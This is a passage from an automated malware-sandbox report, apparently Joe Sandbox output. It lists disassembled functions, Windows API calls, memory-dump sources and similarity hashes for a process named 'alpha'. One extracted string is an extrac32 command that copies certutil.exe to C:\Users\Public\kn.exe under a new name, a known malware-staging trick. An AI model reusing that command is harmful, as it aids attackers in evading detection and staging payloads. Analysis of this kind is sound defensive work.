                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: iswspace.MSVCRT ref: 00007FF7D151D54D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D569
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D58C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7D1517EB7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 168394030-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 96e5a384ac0159cfc5d5f90cadc6b6888d286dd88237e3574d156e0d2fad01b9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63A11722B0C64B89FB65AB2698502BDB391BF84784FC04176D91F87AF5DFBCE4458720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15289E4 Relevance: 3.0, APIs: 2, Instructions: 43nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: InformationQueryToken
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4239771691-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a8d2cfdb7a822df8a561ad8e2dd185e1aa1e13bbf502a2088a7611b66fb4854d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27114CB36187868BFB109B41E4003ADFBA4FB847A5F904172DA49427A4DBBCE588CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1528114 Relevance: 3.0, APIs: 2, Instructions: 41filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: FileInformation$HandleQueryVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2149833895-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 17e95658d3f4a782239f34b8fcf988f2e9def4ba5859189678167cc391498382
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC11422270868686F7609B50F4407AEE790F744784FD45176DA5E42AA4DBFCD448CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1538654 Relevance: 3.0, APIs: 2, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF7D1534227), ref: 00007FF7D1538678
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?,?,?,00000000,00007FF7D1534227), ref: 00007FF7D15386D4
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Time$System$File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2838179519-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: ae9b7743144a4bfaf11cd117986bce8afd6e1aef60f7f7d487a67c0e7462d332
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD115E56518685C5E7249F61E00013EB370FFACB49B945122FA8E83774EB3CC542CB29
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1518510 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D46E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D485
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: iswspace.MSVCRT ref: 00007FF7D151D54D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D569
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D58C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • towupper.MSVCRT ref: 00007FF7D15185D4
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3520273530-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 96321143a607495ea03dfb96cb5b78df38154f99e64000b33d780ef45a9f13ed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB61D022A0C20B85FB75BF24954437DB6A0FB15754FC28177DA1F962E5DEBCA8908331
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D152898C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: InformationQueryToken
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4239771691-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 74e1af2f432be592a59504827ec49a62723a67a5ad64c462cf553c8f17783705
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03F0A0B3704B82CBD7008F64E08449CB778F708B847A5847ACB2903714DBB5D9A4CB50
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151F8C0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 380COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7D151F52A,00000000,00000000,?,00000000,?,00007FF7D151E626,?,?,00000000,00007FF7D1521F69), ref: 00007FF7D151F8DE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F8FB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F951
                                                                                                                                                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F96B
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151FA8E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D151FB14
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151FB2D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151FBEA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D151F996
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7D153849D,?,?,?,00007FF7D153F0C7), ref: 00007FF7D1520045
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7D153F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D1520071
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1520092
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7D15200A7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7D1520181
                                                                                                                                                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D152D401
                                                                                                                                                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D152D41B
                                                                                                                                                                                                                                                                                                                                                                                                                                        • longjmp.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D152D435
                                                                                                                                                                                                                                                                                                                                                                                                                                        • longjmp.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D152D480
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3964947564-518410914
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 858c05a286c9765b737b475739b4b371c87f0724d543fa198112305da3e5543d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42024726A1964B86FB54BF21E8501BCF6A1BF49B54FE54137E90F426B0DFBCA844C230
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15202A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmp$iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 840959033-3627297882
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c7bbdf72d37530d9f0addba3914115681a45449b97e967dd01a61ce2ddc695b7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99D17B22A0864BC6FB54BF21E8452BDB6A0AF54B44FD48077D90F862B6DFBCE4458770
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D152081C Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 130COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
